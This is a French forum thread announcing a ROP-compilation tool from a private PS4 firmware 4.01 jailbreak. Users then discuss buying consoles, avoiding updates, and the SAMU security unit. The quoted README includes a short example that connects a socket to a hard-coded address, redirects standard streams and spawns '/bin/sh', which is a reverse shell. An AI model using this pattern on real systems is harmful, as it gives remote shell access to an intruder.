Aller au contenu


Photo

Le code Ksploit Chaitin dévoilé


  • Veuillez vous connecter pour répondre
47 réponses à ce sujet

Posté 27 octobre 2016 - 20:03

#1
tralala

tralala

    \0/ Postman \0/

  • Newser Expert
  • 12 515 messages
  • Sexe:Male
Chose promise, chose due, le code qui permet l'exploit sous firmware 4.01 a été dévoilé, il s'agit d'un outil privé sous forme de code qui permet le jailbreak de la PlayStation 4.
 
 

 

 

 
PRO: PROgramming ROP like a PRO
 
This is a crappy tool used in our private PS4 jailbreak. Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged process. We have to write the kernel exploitation in ROP, like what has been done in HENKaku jailbreak.
 
Build
 
If you have modified the pro.g4 file, use the following commands to generate new lexer and parser.
 
cd pro/parse && antlr4 -no-listener -visitor -Dlanguage=Python2 pro.g4
Examples
 
toy {
    {% include "gadgets.pro" %}
    {% include "glibc.pro" %}
    const AF_INET(2);
    const SOCK_STREAM(1);
    const IPPROTO_IP(0);
    var fd;
    socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    func store_rdx_rax<libc, 0x0002e60c, "rdx,rax::">;
    store_rdx_rax(&fd, undefined);
    printf("socket fd = %d\n", fd);
    array addr["\x02\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"];
    connect(fd, addr, 0x10);
    {% for i in range(3): %}
        dup2(fd, {{i}});
    {% endfor %}
    system("/bin/sh");
    exit(1);
}
Usage
 
A BIG TODO. Just try and learn by yourself.
 
Quick Guide
 
All expressions should be evaluated during compilation, Const/Func should be initialized in declaration.
 
Func is initialized with . Base/Offset is used for relocation, Signature determines the calling convention of Func.
 
Array can be declared with size(Int) or directly initialized with its content(String).
 
For loop should be written in template script, it will be rendered before compilation. For more information, check Jinja2.

 

 

 
Bien entendu, ce code et les exemples sont réservés aux développeurs.
 
Tout est là : chaitin/pro
 
Téléchargement : ROP Tool 
 

  • Retour en haut

Posté 27 octobre 2016 - 20:09

#2
gael97421

gael97421

    Sunriseur

  • Members
  • PipPip
  • 101 messages
bon et pour les simple users comme moi, on fait quoi maintenant????
  • Retour en haut

Posté 27 octobre 2016 - 20:12

#3
cedsaill

cedsaill

    Sunriseur elite

  • Members
  • PipPipPipPip
  • 1 988 messages

bon et pour les simple users comme moi, on fait quoi maintenant????


Attendre!! mais je sent que ca sent bon
  • Retour en haut

Posté 27 octobre 2016 - 20:17

#4
jbam

jbam

    Sunriseur avancé

  • Members
  • PipPipPip
  • 478 messages
Surtout ne pas mettre à jour sa console :)
C'est quand même dommage pour les constructeurs qu'ils n'ont pas droit de faire des mise à jour automatique obligatoire .
  • Retour en haut

Posté 27 octobre 2016 - 20:23

#5
Waikiki

Waikiki

    Sunriseur avancé

  • Modérateur
  • 983 messages
  • Sexe:Male
Mais c'est que ça sent super bon tout ça !!!!!!! Une console "next gen" hackée avec une architecture x86 me rappel une certaine console qui ressemblait à un tank ;) je rêve d'un coinops sur une console HD !
  • Retour en haut

Posté 27 octobre 2016 - 20:36

#6
Grunchimera

Grunchimera

    Sunriseur avancé

  • Members
  • PipPipPip
  • 460 messages
Wait and See , Noel/fin d'année sa sent bon !
  • Retour en haut

Posté 27 octobre 2016 - 20:39

#7
fabeer

fabeer

    Sunriseur

  • Members
  • PipPip
  • 12 messages

Mais c'est que ça sent super bon tout ça !!!!!!! Une console "next gen" hackée avec une architecture x86 me rappel une certaine console qui ressemblait à un tank ;) je rêve d'un coinops sur une console HD !


1080i pour la xbox,ca reste de la HD ;)
  • Retour en haut

Posté 27 octobre 2016 - 20:40

#8
rim-k06

rim-k06

    Sunriseur avancé

  • Members
  • PipPipPip
  • 576 messages
  • Sexe:Male
  • Passions:mes enfants :),modding,cheating.
Yep,comme dis précédemment le code sur le github est incomplet pour l'instant.

un screen que j'ai fais de la shout de psxhax qui en parle
https://gyazo.com/77...803462eb586044b
  • Retour en haut

Posté 27 octobre 2016 - 20:45

#9
aspire78

aspire78

    Sunriseur

  • Members
  • PipPip
  • 39 messages
donc ça vaudrait la peine d'acheter une slim du stock dans les magasins au cas ou (j'ai pas encore de PS4)

Modifié par aspire78, 27 octobre 2016 - 20:45.

  • Retour en haut

Posté 27 octobre 2016 - 20:46

#10
bzé

bzé

    Sunriseur avancé

  • Members
  • PipPipPip
  • 390 messages
  • Sexe:Male
  • Lieu:belgique
  • Passions:tennis base-ball info et électronique

Yep,comme dis précédemment le code sur le github est incomplet pour l'instant.

un screen que j'ai fais de la shout de psxhax qui en parle
https://gyazo.com/77...803462eb586044b

oui mais là elle est jailbreaké, le reste pourrait aller très vite, regardes avec la vita, la vitesse que the flow à mis pour sortir le 2.0 avant mai dump.
il y a une petite guerre qui s'installe...à suivre
  • Retour en haut

Posté 27 octobre 2016 - 20:52

#11
nuinut

nuinut

    Sunriseur avancé

  • Members
  • PipPipPip
  • 771 messages
  • Sexe:Male
Exact, ça peut aller très vite, j'ai deja ma ps4 qui dort mais pour ceux qui n'en n'ont pas, ça peut être l'occasion
  • Retour en haut

Posté 27 octobre 2016 - 20:52

#12
Mr K

Mr K

    Nouveau / peu actif

  • Members
  • Pip
  • 4 messages
la question qui se pose maintenant, c'est: est-ce que la pro qui sort le 10 novembre, donc dans 15 jours sera en FW >4.01 ?......
ça peut valoir le coup d'attendre quelques jours et ensuite si besoin faire la chasse aux packs dans les magasins ;)

Modifié par Mr K, 27 octobre 2016 - 20:52.

  • Retour en haut

Posté 27 octobre 2016 - 20:54

#13
bzé

bzé

    Sunriseur avancé

  • Members
  • PipPipPip
  • 390 messages
  • Sexe:Male
  • Lieu:belgique
  • Passions:tennis base-ball info et électronique

la question qui se pose maintenant, c'est: est-ce que la pro qui sort le 10 novembre, donc dans 15 jours sera en FW >4.01 ?......
ça peut valoir le coup d'attendre quelques jours et ensuite si besoin faire la chasse aux packs dans les magasins ;)


ce serait un cadeau du ciel ! lol mais oui pkoi pas!!!!

Modifié par bzé, 27 octobre 2016 - 20:54.

  • Retour en haut

Posté 27 octobre 2016 - 20:54

#14
aspire78

aspire78

    Sunriseur

  • Members
  • PipPip
  • 39 messages
Justement j'hésite pour la pro, Si les box sont déjà sur le chemin oui ça vaut peut-être la peine ...
  • Retour en haut

Posté 27 octobre 2016 - 20:55

#15
nuinut

nuinut

    Sunriseur avancé

  • Members
  • PipPipPip
  • 771 messages
  • Sexe:Male
Pas sûr que la sécurité soit la même sur ps4 et ps4 pro, comme sur ps3 et ps3 ultraslim
  • Retour en haut

Posté 27 octobre 2016 - 20:59

#16
bzé

bzé

    Sunriseur avancé

  • Members
  • PipPipPip
  • 390 messages
  • Sexe:Male
  • Lieu:belgique
  • Passions:tennis base-ball info et électronique
il y a chaque fois de quoi se poser des questions, sony ne fait plus de licence sur vita et hop une faille!
la pro le 10nov et hop une re-faille sur la slim???
  • Retour en haut

Posté 27 octobre 2016 - 21:04

#17
rim-k06

rim-k06

    Sunriseur avancé

  • Members
  • PipPipPip
  • 576 messages
  • Sexe:Male
  • Passions:mes enfants :),modding,cheating.

Yep,comme dis précédemment le code sur le github est incomplet pour l'instant. un screen que j'ai fais de la shout de psxhax qui en parlehttps://gyazo.com/77...803462eb586044b

oui mais là elle est jailbreaké, le reste pourrait aller très vite, regardes avec la vita, la vitesse que the flow à mis pour sortir le 2.0 avant mai dump.il y a une petite guerre qui s'installe...à suivre

yep bzé, ça na pas de rapport avec les dumpers de tool ^^ la on parle de l'exploit en lui même,les hackeurs ont expliquer que leur exploit fonctionner de façon assez similaire à HENkaku,et comme le dit la news sur leur github il y a l'outil qui permet l'exploit,mais cet outil est incomplet et on ne peux rien en tirer a l’état actuel.

de plus même si on a l'exploit (jailbreak)(linux),ça veux pas du tout dire qu'on aura un dumper comme Vitamine ou MaiDump tool,la ps4 contient une sécurité qui s'appelle SAMU(Sécurity assets management unit)cet sécurité n'est pas présente sur la PS vita or elle l'est sur la ps4 et elle gère tout ce qui est signature de jeux hombrews savegame etc etc et même avec un exploit kernel on y aura pas accès,,voila pourquoi on ne voit pas de backup de jeux même en 1.76.

La fameuse sécurité SAMU
https://www.google.c...s/US20120102333 ;)

j'ai écrit un pavé pour t'expliquer pas pour t'agresser ou te dire que t'avais tort^^ (je prefere préciser au cas ou pour les susceptible qui traîne depuis 2 jours) ;)
  • Retour en haut

Posté 27 octobre 2016 - 21:17

#18
shonan

shonan

    Sunriseur

  • Members
  • PipPip
  • 221 messages
Excellent! Wait and see j'ai envie de dire.!
  • Retour en haut

Posté 27 octobre 2016 - 21:26

#19
bzé

bzé

    Sunriseur avancé

  • Members
  • PipPipPip
  • 390 messages
  • Sexe:Male
  • Lieu:belgique
  • Passions:tennis base-ball info et électronique

Yep,comme dis précédemment le code sur le github est incomplet pour l'instant. un screen que j'ai fais de la shout de psxhax qui en parlehttps://gyazo.com/77...803462eb586044b

oui mais là elle est jailbreaké, le reste pourrait aller très vite, regardes avec la vita, la vitesse que the flow à mis pour sortir le 2.0 avant mai dump.il y a une petite guerre qui s'installe...à suivre

yep bzé, ça na pas de rapport avec les dumpers de tool ^^ la on parle de l'exploit en lui même,les hackeurs ont expliquer que leur exploit fonctionner de façon assez similaire à HENkaku,et comme le dit la news sur leur github il y a l'outil qui permet l'exploit,mais cet outil est incomplet et on ne peux rien en tirer a l’état actuel.de plus même si on a l'exploit (jailbreak)(linux),ça veux pas du tout dire qu'on aura un dumper comme Vitamine ou MaiDump tool,la ps4 contient une sécurité qui s'appelle SAMU(Sécurity assets management unit)cet sécurité n'est pas présente sur la PS vita or elle l'est sur la ps4 et elle gère tout ce qui est signature de jeux hombrews savegame etc etc et même avec un exploit kernel on y aura pas accès,,voila pourquoi on ne voit pas de backup de jeux même en 1.76.La fameuse sécurité SAMUhttps://www.google.c...s/US20120102333 ;)j'ai écrit un pavé pour t'expliquer pas pour t'agresser ou te dire que t'avais tort^^ (je prefere préciser au cas ou pour les susceptible qui traîne depuis 2 jours) ;)

écoute rim ! je vais faire court car je ne veux pas du tout partir comme l'autre cretin là où tu sais. je cite simplement un exemple de la vitesse (potentielle) à la quelle cela pourrait aller.je n'ai pas du tout confondu (dans le sens mélangé) les dumpers et l'exploit.en gros ce que je dit, c'est qu'on aura peut-être affaire à qq hacker et dev qui vont se la jouer à qui à la plus grosse genre le comportement de the flow par rapport au chinois (dixit the flow). la scène s'accélère à mon sens. et qd bien même? qui dit que personne ne détient un dump bien au chaud ?henkaku = +- juillet 2016 2 mois plus tard, the flow, une semaine après mai dump...même si tu multiplie par 10 ou peu importe, je pense connaître la suite logique un jour ou l'autre.

Modifié par bzé, 27 octobre 2016 - 21:31.

  • Retour en haut

Posté 27 octobre 2016 - 21:32

#20
rim-k06

rim-k06

    Sunriseur avancé

  • Members
  • PipPipPip
  • 576 messages
  • Sexe:Male
  • Passions:mes enfants :),modding,cheating.

Yep,comme dis précédemment le code sur le github est incomplet pour l'instant. un screen que j'ai fais de la shout de psxhax qui en parlehttps://gyazo.com/77...803462eb586044b

oui mais là elle est jailbreaké, le reste pourrait aller très vite, regardes avec la vita, la vitesse que the flow à mis pour sortir le 2.0 avant mai dump.il y a une petite guerre qui s'installe...à suivre

yep bzé, ça na pas de rapport avec les dumpers de tool ^^ la on parle de l'exploit en lui même,les hackeurs ont expliquer que leur exploit fonctionner de façon assez similaire à HENkaku,et comme le dit la news sur leur github il y a l'outil qui permet l'exploit,mais cet outil est incomplet et on ne peux rien en tirer a l’état actuel.de plus même si on a l'exploit (jailbreak)(linux),ça veux pas du tout dire qu'on aura un dumper comme Vitamine ou MaiDump tool,la ps4 contient une sécurité qui s'appelle SAMU(Sécurity assets management unit)cet sécurité n'est pas présente sur la PS vita or elle l'est sur la ps4 et elle gère tout ce qui est signature de jeux hombrews savegame etc etc et même avec un exploit kernel on y aura pas accès,,voila pourquoi on ne voit pas de backup de jeux même en 1.76.La fameuse sécurité SAMUhttps://www.google.c...s/US20120102333 ;)j'ai écrit un pavé pour t'expliquer pas pour t'agresser ou te dire que t'avais tort^^ (je prefere préciser au cas ou pour les susceptible qui traîne depuis 2 jours) ;)

écoute rim ! je vais faire court car je ne veux pas du tout partir comme l'autre cretin là où tu sais. je cite simplement un exemple de la vitesse (potentielle) à la que cela pourrait aller.je n'ai pas du tout confondu (dans le sens mélangé) les dumpers et l'exploit.en gros ce que je dit, c'est qu'on aura peut-être affaire à qq hacker et dev qui vont se la jouer à qui à la plus grosse genre le comportement de the flow par rapport au chinois (dixit the flow). la scène s'accélère à mon sens. et qd bien même? qui dit que personne ne détient un dump bien au chaud ?henkaku = +- juillet 2016 2 mois plus tard, the flow, une semaine après mai dump...même si tu multiplie par 10 ou peu importe, je pense connaître la suite logique un jour ou l'autre.

je disait pas tu tout ça pour te remballer au contraire juste pour essayer de vous dire a tous de pas vous enflammez au risque d'etre décu,SAMU est une tres grosse sécurité bien supérieur a ce qu'a connu la ps vita,c'est tout ce que je voulais te dire ;) rien de mal ;)
  • Retour en haut




0 utilisateur(s) li(sen)t ce sujet

0 invité(s) et 0 utilisateur(s) anonyme(s)